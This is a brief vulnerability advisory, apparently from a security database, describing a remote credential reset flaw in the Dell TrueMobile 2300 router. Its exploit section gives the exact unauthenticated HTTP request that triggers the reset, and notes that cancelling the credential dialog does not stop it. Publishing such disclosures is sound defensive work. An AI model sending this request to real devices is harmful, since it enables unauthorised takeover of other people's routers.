Dell TrueMobile 2300 Remote Credential Reset Vulnerability

info
discussion
exploit
solution
references

Dell TrueMobile 2300 Remote Credential Reset Vulnerability

The attacker need only request:

http://target/apply.cgi?Page=adv_password.asp&action=ClearLog

A dialog requesting credentials may appear. The action will be performed, even if "cancel" is clicked.